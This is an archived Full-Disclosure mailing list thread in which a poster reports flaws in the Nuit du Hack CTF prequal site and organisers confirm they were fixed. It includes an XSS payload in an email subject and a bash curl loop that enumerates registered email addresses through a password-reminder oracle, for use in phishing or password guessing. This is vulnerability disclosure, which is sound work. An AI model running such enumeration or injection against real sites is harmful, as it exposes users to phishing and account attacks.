lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Date: Mon, 26 Mar 2012 13:42:11 +0200
From: majinboo <majinboo@...kerzvoice.net>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: Oracle based personal data dumping attack on
 the nuit du hack CTF

BTW last vuln' was also fixed during the prequals.

MajinBoo

Le 26/03/12 13:37, Damien Cauquil a écrit :
> Hi klondike,
>
>
> > PS: What I wonder now is, are the guys behind the CTF reading 
> Full-disclosure?
>
> I guess you now have your answer.
>
> > The guys have a cool XSS injection on the fake webmail service which 
> can be exploited with a properly crafted subject
>
> You're right, and it has been fixed during the prequals. Anyway, this 
> vulnerability is minor because teams couldn't send emails to each 
> others. At least, you can pwn your own web browser.
>
> For the last vuln mentionned, we were aware of it. Guys who wrote the 
> code were seriously slapped.
>
> Damien, NDH prequals team
>
> -- 
> *Damien Cauquil*
> Directeur de Recherche
> CEH, CHFI, ECSA, CEI
> Tél. : +33 (0)1 78 76 58 21
> Fax.: +33 (0)1 40 12 74 41
>
> *Sysdream IT Security Services*
> 108, av. Gabriel Péri
> 93400 Saint Ouen
> http://www.sysdream.com/
>
> Le samedi 24 mars 2012 à 05:54 +0100, klondike a écrit :
>> El 24/03/12 05:27, klondike escribió:
>>> So I was bored with the nuit du hack prequals and decided to test a 
>>> bit the e-mail service.
>>>
>>> The guys have a cool XSS injection on the fake webmail service which 
>>> can be exploited with a properly crafted subject (i.e. 
>>> <script>alert('Hello!');</script> ). I thought the guys behind nuit 
>>> du hack were a bit more serious than this...
>>>
>>> klondike
>>>
>> BTW and on completely unrelated note there is an attack which could 
>> allow an attacker to guess the addresses of the participants as long 
>> as they are on a database owned by him. This attack works by 
>> consulting the page as if it were a yes/no oracle and using the 
>> results to know wether an address is on the page database or not.
>>
>> Usages of the attack? Well, trying to guess participants passwords, 
>> phising attacks, spamming ... Pick your choice xD
>>
>> And as with any good full disclosure here you go a nice script to 
>> exploit it:
>> while read email; do curl -s -o- 
>> http://prequals.nuitduhack.com/rememberme.php -d "mail=$email" | 
>> fgrep '<div class="error">This mail doesn'\''t correspond to any 
>> account</div>' > /dev/null && echo Failure || echo "$email"; done
>>
>> Well don't be bad with it, participants have no fault of this,
>>
>> klondike
>>
>> PS: What I wonder now is, are the guys behind the CTF reading 
>> Full-disclosure?
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter:http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia -http://secunia.com/
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/


Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ